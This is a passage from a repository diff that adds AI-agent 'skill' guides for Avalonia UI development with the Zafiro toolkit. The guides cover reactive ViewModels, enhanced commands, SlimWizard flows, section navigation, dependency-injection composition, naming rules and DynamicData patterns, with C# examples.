2. **Enhanced Commands**: Utilize `IEnhancedCommand` for better command management, including progress reporting and name/text attributes.
3. **Wizard Pattern**: Implement complex flows using `SlimWizard` and `WizardBuilder` for a declarative and maintainable approach.
4. **Automatic Section Discovery**: Use the `[Section]` attribute to register and discover UI sections automatically.
5. **Clean Composition**: Map ViewModels to Views using `DataTypeViewLocator` and manage dependencies in the `CompositionRoot`.

## Guides

- [ViewModels & Commands](viewmodels.md): Creating robust ViewModels and handling commands.
- [Wizards & Flows](wizards.md): Building multi-step wizards with `SlimWizard`.
- [Navigation & Sections](navigation_sections.md): Managing navigation and section-based UIs.
- [Composition & Mapping](composition.md): Best practices for View-ViewModel wiring and DI.

## Example Reference

For real-world implementations, refer to the **Angor** project:
- `CreateProjectFlowV2.cs`: An excellent example of complex Wizard building.
- `HomeViewModel.cs`: A simple section ViewModel using functional-reactive commands.

## When to Use

Use this skill to execute the workflow and actions described in the overview.
@ -0,0 +1,75 @@
# Composition & Mapping

Ensuring your ViewModels are correctly instantiated and mapped to their corresponding Views is crucial for a maintainable application.

## ViewModel-to-View Mapping

Zafiro uses the `DataTypeViewLocator` to automatically map ViewModels to Views based on their data type.

### Integration in App.axaml

Register the `DataTypeViewLocator` in your application's data templates:

```xml
<Application.DataTemplates>
    <DataTypeViewLocator />
    <DataTemplateInclude Source="avares://Zafiro.Avalonia/DataTemplates.axaml" />
</Application.DataTemplates>
```

### Registration

Mappings can be registered globally or locally. Common practice in Zafiro projects is to use naming conventions or explicit registrations made by source generators.

## Composition Root

Use a central `CompositionRoot` to manage dependency injection and service registration.

```csharp
public static class CompositionRoot
{
    public static IShellViewModel CreateMainViewModel(Control topLevelView)
    {
        var services = new ServiceCollection();

        services
            .AddViewModels()
            .AddUIServices(topLevelView);

        var serviceProvider = services.BuildServiceProvider();
        return serviceProvider.GetRequiredService<IShellViewModel>();
    }
}
```

### Registering ViewModels

Register ViewModels with appropriate scopes (Transient, Scoped, or Singleton).

```csharp
public static IServiceCollection AddViewModels(this IServiceCollection services)
{
    return services
        .AddTransient<IHomeSectionViewModel, HomeSectionViewModel>()
        .AddSingleton<IShellViewModel, ShellViewModel>();
}
```

## View Injection

Use the `Connect` helper (if available) or manual instantiation in `OnFrameworkInitializationCompleted`:

```csharp
public override void OnFrameworkInitializationCompleted()
{
    this.Connect(
        () => new ShellView(),
        view => CompositionRoot.CreateMainViewModel(view),
        () => new MainWindow());

    base.OnFrameworkInitializationCompleted();
}
```

> [!TIP]
> Use `ActivatorUtilities.CreateInstance` when you need to manually instantiate a class while still resolving its dependencies from the `IServiceProvider`.
@ -0,0 +1,53 @@
# Navigation & Sections

Zafiro provides powerful abstractions for managing application-wide navigation and modular UI sections.

## Navigation with INavigator

The `INavigator` interface is used to switch between different views or ViewModels.

```csharp
public class MyViewModel(INavigator navigator)
{
    public async Task GoToDetails()
    {
        await navigator.Navigate(() => new DetailsViewModel());
    }
}
```

## UI Sections

Sections are modular parts of the UI (like tabs or sidebar items) that can be automatically registered.

### The [Section] Attribute

ViewModels intended to be sections should be marked with the `[Section]` attribute.

```csharp
[Section("Wallet", icon: "fa-wallet")]
public class WalletSectionViewModel : IWalletSectionViewModel
{
    // ...
}
```

### Automatic Registration

In the `CompositionRoot`, sections can be automatically registered:

```csharp
services.AddAnnotatedSections(logger);
services.AddSectionsFromAttributes(logger);
```

### Switching Sections

You can switch the current active section via the `IShellViewModel`:

```csharp
shellViewModel.SetSection("Browse");
```

> [!IMPORTANT]
> The `icon` parameter in the `[Section]` attribute supports FontAwesome icons (e.g., `fa-home`) when configured with `ProjektankerIconControlProvider`.
68
packages/llm/skills/avalonia-viewmodels-zafiro/viewmodels.md
Normal file
@ -0,0 +1,68 @@
# ViewModels & Commands

In a Zafiro-based application, ViewModels should be functional, reactive, and resilient.

## Reactive ViewModels

Use `ReactiveObject` as the base class. Properties should be defined using the `[Reactive]` attribute (from ReactiveUI.SourceGenerators) for brevity.

```csharp
public partial class MyViewModel : ReactiveObject
{
    [Reactive] private string name;
    [Reactive] private bool isBusy;
}
```

### Observation and Transformation

Use `WhenAnyValue` to react to property changes:

```csharp
this.WhenAnyValue(x => x.Name)
    .Select(name => !string.IsNullOrEmpty(name))
    .ToPropertyEx(this, x => x.CanSubmit);
```

## Enhanced Commands

Zafiro uses `IEnhancedCommand`, which extends `ICommand` and `IReactiveCommand` with additional metadata like `Name` and `Text`.

### Creating a Command

Use `ReactiveCommand.Create` or `ReactiveCommand.CreateFromTask` and then `Enhance()` it.

```csharp
public IEnhancedCommand Submit { get; }

public MyViewModel()
{
    Submit = ReactiveCommand.CreateFromTask(OnSubmit, canSubmit)
        .Enhance(text: "Submit Data", name: "SubmitCommand");
}
```

### Error Handling

Use `HandleErrorsWith` to automatically channel command errors to the `NotificationService`.

```csharp
Submit.HandleErrorsWith(uiServices.NotificationService, "Submission Failed")
    .DisposeWith(disposable);
```

## Disposables

Always use a `CompositeDisposable` to manage subscriptions and command lifetimes.

```csharp
public class MyViewModel : ReactiveObject, IDisposable
{
    private readonly CompositeDisposable disposables = new();

    public void Dispose() => disposables.Dispose();
}
```

> [!TIP]
> Use `.DisposeWith(disposables)` on any observable subscription or command to ensure proper cleanup.
47
packages/llm/skills/avalonia-viewmodels-zafiro/wizards.md
Normal file
@ -0,0 +1,47 @@
# Wizards & Flows

Complex multi-step processes are handled using the `SlimWizard` pattern. This provides a declarative way to define steps, navigation logic, and final results.

## Defining a Wizard

Use `WizardBuilder` to define the steps. Each step corresponds to a ViewModel.

```csharp
SlimWizard<string> wizard = WizardBuilder
    .StartWith(() => new Step1ViewModel(data))
    .NextUnit()
    .WhenValid()
    .Then(prevResult => new Step2ViewModel(prevResult))
    .NextCommand(vm => vm.CustomNextCommand)
    .Then(result => new SuccessViewModel("Done!"))
    .Next((_, s) => s, "Finish")
    .WithCompletionFinalStep();
```

### Navigation Rules

- **NextUnit()**: Advances when a simple signal is emitted.
- **NextCommand()**: Advances when a specific command in the ViewModel executes successfully.
- **WhenValid()**: Waits until the current ViewModel's validation passes before allowing navigation.
- **Always()**: Navigation is always allowed.

## Navigation Integration

The wizard is navigated using an `INavigator`:

```csharp
public async Task CreateSomething()
{
    var wizard = BuildWizard();
    var result = await wizard.Navigate(navigator);
    // Handle result
}
```

## Step Configuration

- **WithCompletionFinalStep()**: Marks the wizard as finished when the last step completes.
- **WithCommitFinalStep()**: Typically used for wizards that perform a final "Save" or "Deploy" action.

> [!NOTE]
> The `SlimWizard` handles the "Back" command automatically, providing a consistent user experience across different flows.
35
packages/llm/skills/avalonia-zafiro-development/SKILL.md
Normal file
@ -0,0 +1,35 @@
---
name: avalonia-zafiro-development
description: "Mandatory skills, conventions, and behavioral rules for Avalonia UI development using the Zafiro toolkit."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Avalonia Zafiro Development

This skill defines the mandatory conventions and behavioral rules for developing cross-platform applications with Avalonia UI and the Zafiro toolkit. These rules prioritize maintainability, correctness, and a functional-reactive approach.

## Core Pillars

1. **Functional-Reactive MVVM**: Pure MVVM logic using DynamicData and ReactiveUI.
2. **Safety & Predictability**: Explicit error handling with `Result` types and avoidance of exceptions for flow control.
3. **Cross-Platform Excellence**: Strictly Avalonia-independent ViewModels and composition-over-inheritance.
4. **Zafiro First**: Leverage existing Zafiro abstractions and helpers to avoid redundancy.

## Guides

- [Core Technical Skills & Architecture](core-technical-skills.md): Fundamental skills and architectural principles.
- [Naming & Coding Standards](naming-standards.md): Rules for naming, fields, and error handling.
- [Avalonia, Zafiro & Reactive Rules](avalonia-reactive-rules.md): Specific guidelines for UI, Zafiro integration, and DynamicData pipelines.
- [Zafiro Shortcuts](zafiro-shortcuts.md): Concise mappings for common Rx/Zafiro operations.
- [Common Patterns](patterns.md): Advanced patterns like `RefreshableCollection` and Validation.

## Procedure Before Writing Code

1. **Search First**: Search the codebase for similar implementations or existing Zafiro helpers.
2. **Reusable Extensions**: If a helper is missing, propose a new reusable extension method instead of inlining complex logic.
3. **Reactive Pipelines**: Ensure DynamicData operators are used instead of plain Rx where applicable.

## When to Use

Use this skill to execute the workflow and actions described in the overview.
@ -0,0 +1,49 @@
# Avalonia, Zafiro & Reactive Rules

## Avalonia UI Rules

- **Strict Avalonia**: Never use `System.Drawing`; always use Avalonia types.
- **Pure ViewModels**: ViewModels must **never** reference Avalonia types.
- **Bindings Over Code-Behind**: Logic should be driven by bindings, not code-behind.
- **DataTemplates**: Prefer explicit `DataTemplate`s and typed `DataContext`s.
- **VisualStates**: Avoid `VisualStates` unless absolutely required.

## Zafiro Guidelines

- **Prefer Abstractions**: Always look for existing Zafiro helpers, extension methods, and abstractions before re-implementing logic.
- **Validation**: Use Zafiro's `ValidationRule` and validation extensions instead of ad-hoc reactive logic.

## DynamicData & Reactive Rules

### The Mandatory Approach

- **Operator Preference**: Always prefer **DynamicData** operators (`Connect`, `Filter`, `Transform`, `Sort`, `Bind`, `DisposeMany`) over plain Rx operators when working with collections.
- **Readable Pipelines**: Build and maintain pipelines as a single, readable chain.
- **Lifecycle**: Use `DisposeWith` for lifecycle management.
- **Minimal Subscriptions**: Subscriptions should be minimal, centralized, and strictly for side effects.
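The rules above can be sketched as a single DynamicData chain. This is a minimal illustration, not Angor code: `TodoItem` and `TodoListViewModel` are hypothetical types invented for the example.

```csharp
using System;
using System.Collections.ObjectModel;
using System.Reactive.Disposables;
using DynamicData;
using DynamicData.Binding;
using ReactiveUI;

// Hypothetical model type, used only for this sketch.
public record TodoItem(int Id, string Title, bool IsDone);

public class TodoListViewModel : IDisposable
{
    private readonly CompositeDisposable disposables = new();
    private readonly SourceCache<TodoItem, int> source = new(item => item.Id);

    public TodoListViewModel()
    {
        // One readable chain: DynamicData operators only, a single
        // side-effect-free Subscribe, and DisposeWith for lifecycle.
        source.Connect()
            .Filter(item => !item.IsDone)
            .Sort(SortExpressionComparer<TodoItem>.Ascending(item => item.Title))
            .Bind(out var items)
            .Subscribe()
            .DisposeWith(disposables);

        Items = items;
    }

    public ReadOnlyObservableCollection<TodoItem> Items { get; }

    public void Dispose() => disposables.Dispose();
}
```

Note that the only `Subscribe()` call carries no logic at all; filtering, sorting, and binding all live in the operator chain.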
### Forbidden Anti-Patterns

- **Ad-hoc Sources**: Do NOT create new `SourceList`/`SourceCache` instances on the fly for local problems.
- **Logic in Subscribe**: Do NOT place business logic inside `Subscribe`.
- **Operator Mismatch**: Do NOT use `System.Reactive` operators if a DynamicData equivalent exists.

### Canonical Patterns

**Validation of Dynamic Collections:**

```csharp
this.ValidationRule(
    StagesSource
        .Connect()
        .FilterOnObservable(stage => stage.IsValid)
        .IsEmpty(),
    b => !b,
    _ => "Stages are not valid")
    .DisposeWith(Disposables);
```

**Filtering Nulls:**

Use `WhereNotNull()` in reactive pipelines:

```csharp
this.WhenAnyValue(x => x.DurationPreset).WhereNotNull()
```
@ -0,0 +1,19 @@
# Core Technical Skills & Architecture

## Mandatory Expertise

The developer must possess strong expertise in:

- **C# and modern .NET**: Utilizing the latest features of the language and framework.
- **Avalonia UI**: For cross-platform UI development.
- **MVVM Architecture**: Maintaining strict separation between UI and business logic.
- **Clean Code & Clean Architecture**: Focusing on maintainability and inward dependency flow.
- **Functional Programming in C#**: Embracing immutability and functional patterns.
- **Reactive Programming**: Expertise in DynamicData and System.Reactive.

## Architectural Principles

- **Pure MVVM**: Mandatory for all UI code. Logic must be independent of UI concerns.
- **Composition over Inheritance**: Favor modular building blocks over deep inheritance hierarchies.
- **Inward Dependency Flow**: Abstractions must not depend on implementations.
- **Immutability**: Prefer immutable structures where practical to ensure predictability.
- **Stable Public APIs**: Design APIs carefully to ensure long-term stability and clarity.
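As a minimal illustration of the immutability principle, C# records give value semantics and non-destructive updates out of the box. The `Stage` type here is hypothetical, invented for the sketch:

```csharp
using System;

// Hypothetical domain type: immutable by default as a positional record.
public sealed record Stage(string Name, decimal Amount);

public static class Example
{
    public static void Main()
    {
        var original = new Stage("Design", 5m);

        // `with` creates a modified copy; `original` is never mutated.
        var updated = original with { Amount = 10m };

        Console.WriteLine(original); // Stage { Name = Design, Amount = 5 }
        Console.WriteLine(updated);  // Stage { Name = Design, Amount = 10 }
    }
}
```

Because state never changes in place, reactive pipelines that observe these values stay predictable.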
@ -0,0 +1,15 @@
# Naming & Coding Standards

## General Standards

- **Explicit Names**: Favor clarity over cleverness.
- **Async Suffix**: Do **NOT** use the `Async` suffix in method names, even if they return `Task`.
- **Private Fields**: Do **NOT** use the `_` prefix for private fields.
- **Static State**: Avoid static state unless explicitly justified and documented.
- **Method Design**: Keep methods small, expressive, and with low cyclomatic complexity.
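A small sketch of these conventions, with hypothetical types invented for illustration: no `Async` suffix even on `Task`-returning methods, and no `_` prefix on private fields.

```csharp
using System.Threading.Tasks;

public class ProjectLoader
{
    // No "_" prefix on private fields.
    private readonly IProjectStore store;

    public ProjectLoader(IProjectStore store)
    {
        this.store = store;
    }

    // Returns Task, but no "Async" suffix.
    public Task<int> CountProjects() => store.Count();
}

// Hypothetical dependency, included only to keep the sketch self-contained.
public interface IProjectStore
{
    Task<int> Count();
}
```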
## Error Handling

- **Result & Maybe**: Use types from **CSharpFunctionalExtensions** for flow control and error handling.
- **Exceptions**: Reserved strictly for truly exceptional, unrecoverable situations.
- **Boundaries**: Never allow exceptions to leak across architectural boundaries.
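A minimal sketch of `Result`-based flow control with CSharpFunctionalExtensions; the percentage-parsing scenario is hypothetical, but `Result.Success`, `Result.Failure`, `Bind`, and `Match` are the library's standard API:

```csharp
using CSharpFunctionalExtensions;

public static class PercentParser
{
    // Failures travel as values; no exceptions for flow control.
    public static Result<int> Parse(string input) =>
        int.TryParse(input, out var value)
            ? Result.Success(value)
            : Result.Failure<int>($"'{input}' is not a number");

    public static Result<int> EnsurePercent(int value) =>
        value is >= 0 and <= 100
            ? Result.Success(value)
            : Result.Failure<int>($"{value} is out of range");
}

// Usage: chain steps with Bind; the first failure short-circuits,
// and Match resolves both outcomes at the boundary.
// PercentParser.Parse("42")
//     .Bind(PercentParser.EnsurePercent)
//     .Match(ok => $"valid: {ok}", error => $"invalid: {error}");
```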
45
packages/llm/skills/avalonia-zafiro-development/patterns.md
Normal file
@ -0,0 +1,45 @@
# Common Patterns in Angor/Zafiro

## Refreshable Collections

The `RefreshableCollection` pattern manages lists that can be refreshed via a command, maintaining an internal `SourceCache`/`SourceList` and exposing a `ReadOnlyObservableCollection`.

### Implementation

```csharp
var refresher = RefreshableCollection.Create(
        () => GetDataTask(),
        model => model.Id)
    .DisposeWith(disposable);

LoadData = refresher.Refresh;
Items = refresher.Items;
```

### Benefits

- **Automatic Loading**: Handles the command execution and results.
- **Efficient Updates**: Uses `EditDiff` internally to update items without clearing the list.
- **UI Friendly**: Exposes `Items` as a `ReadOnlyObservableCollection` suitable for binding.
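The `EditDiff` update mentioned above can be sketched directly against a `SourceCache`. This is only an illustration of the DynamicData operator, not Zafiro's actual internals; `Project` and `FetchProjects` are hypothetical.

```csharp
using System.Collections.Generic;
using System.Threading.Tasks;
using DynamicData;

// Hypothetical model with record value equality.
public record Project(int Id, string Name);

public class ProjectCatalog
{
    private readonly SourceCache<Project, int> cache = new(p => p.Id);

    public async Task Refresh()
    {
        IReadOnlyList<Project> latest = await FetchProjects();

        // EditDiff computes adds, updates, and removes in one batch,
        // so bound collections update in place instead of being cleared.
        cache.EditDiff(latest, (a, b) => a == b);
    }

    // Hypothetical data source.
    private Task<IReadOnlyList<Project>> FetchProjects() =>
        Task.FromResult<IReadOnlyList<Project>>(new[] { new Project(1, "Angor") });
}
```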
## Mandatory Validation Pattern

When validating dynamic collections, always use the Zafiro validation extension:

```csharp
this.ValidationRule(
    StagesSource
        .Connect()
        .FilterOnObservable(stage => stage.IsValid)
        .IsEmpty(),
    b => !b,
    _ => "Stages are not valid")
    .DisposeWith(Disposables);
```

## Error Handling Pipeline

Instead of a manual `Subscribe`, use `HandleErrorsWith` to pipe errors directly to the user:

```csharp
LoadProjects.HandleErrorsWith(uiServices.NotificationService, "Could not load projects");
```